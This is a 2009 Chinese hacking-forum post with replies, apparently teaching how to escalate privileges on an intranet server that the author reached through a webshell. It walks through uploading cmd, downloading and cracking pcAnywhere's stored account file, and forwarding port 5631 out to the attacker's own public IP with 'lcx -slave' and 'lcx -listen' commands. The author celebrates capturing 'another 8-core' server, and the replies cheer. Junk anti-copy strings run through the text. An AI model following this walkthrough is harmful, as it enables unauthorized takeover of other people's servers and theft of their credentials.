标题:
[原创文章]
pcanywhere之内网提权
[打印本页]
作者:
huar
时间:
2009-7-5 21:35
标题:
pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
# @! j; L3 w; g) f7 D
+ g4 e0 b4 x0 e. d: m
提权方法:pcanywhere+LCX
! s! a3 ^* a* m% G/ Q, p: z
, `4 W. H8 y" W- Z0 j
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
: N) p& v( E, O {0 E
9 s u; [4 K( A7 q* f' {
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
+ y% w8 A5 _9 U) K: t
' w4 R6 L! X$ D
[attach]1548[/attach]
* i( R( y6 ?' Q! y) T* X. H0 ^9 K
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
4 S0 e2 q3 Q9 ?; |) j- U, Q. }
4 }; U5 z |1 z7 V4 v$ @
[attach]1549[/attach]
. W7 t. n V+ t! _
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
5 L: V. r: F$ R+ z: h P' X
) v/ }% ~5 u0 I5 f
[attach]1550[/attach]
. i& i7 P. x( e$ }- b( u
+ g/ P2 |" f, }
[attach]1551[/attach]
+ G: s, `1 y: |% D, P" n
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
2 |8 b0 B9 h. F5 D# \
1 x" X7 T! {' D( S; @7 L+ o% h
[attach]1552[/attach]
9 X2 w: D( g; V4 I* ^3 D' o/ K$ s6 o
LCX的用法再简单说下:
9 T8 j: o3 `: C5 ]/ x
6 I! D1 K7 M0 W" u; e- p) A+ g4 T
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
8 Z9 ?& a% h/ T; P3 o$ N$ v) n
: y B: l+ ~2 V$ t
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
d$ r2 ]4 Z" E+ g4 e+ I' }: r
& r7 E1 [# e" m! |$ k; j- h) M
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
- T" K6 i! w( m
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
- j9 l3 s) V/ w* e1 z
9 Q! S0 z- {' e3 f& ~+ X+ h' l
[attach]1553[/attach]
$ g; m @# h' o9 B
@' a& }% V* C7 N" g8 ?) T; S
[attach]1554[/attach]
9 q4 z) I8 b% E" |# b8 b2 \
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
) d, a$ |6 _% C0 A. Y2 n ?# L& C
% B" O. u B8 q# c, N8 I# k
[attach]1555[/attach]
/ Z/ J7 i# a! B
: a& S; y9 r `
[attach]1556[/attach]
. y* k2 J, G7 k4 u
我们本地连接试试,输入我们刚破解的账号密码
. r* F! z, J, ?" `& l
* ~. k8 h! C1 ]% M! c' n
[attach]1557[/attach]
( {. l$ t& O% b$ w! F( l5 e2 r
呵呵``连接成功,服务器不错,又一个8核^︵^
1 @/ g4 H( {) e
1 O! c% K Y4 p$ g9 F
[attach]1558[/attach]
% G0 A* H: M2 T* n% B0 R/ }" s- P
3 }+ q5 G# D Y! u! }! J
[attach]1559[/attach]
作者:
柔肠寸断
时间:
2009-7-5 21:37
不错不错。。。你的貌似一直都是内网服务器哈
作者:
huar
时间:
2009-7-5 21:41
哎。。。。运气不佳```老碰见内网的。。。。
作者:
gassiori
时间:
2009-7-6 09:50
八核的哟
作者:
柔肠寸断
时间:
2009-12-15 15:36
顶起。。。。。。。。。
作者:
killadmin
时间:
2010-1-21 20:01
但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2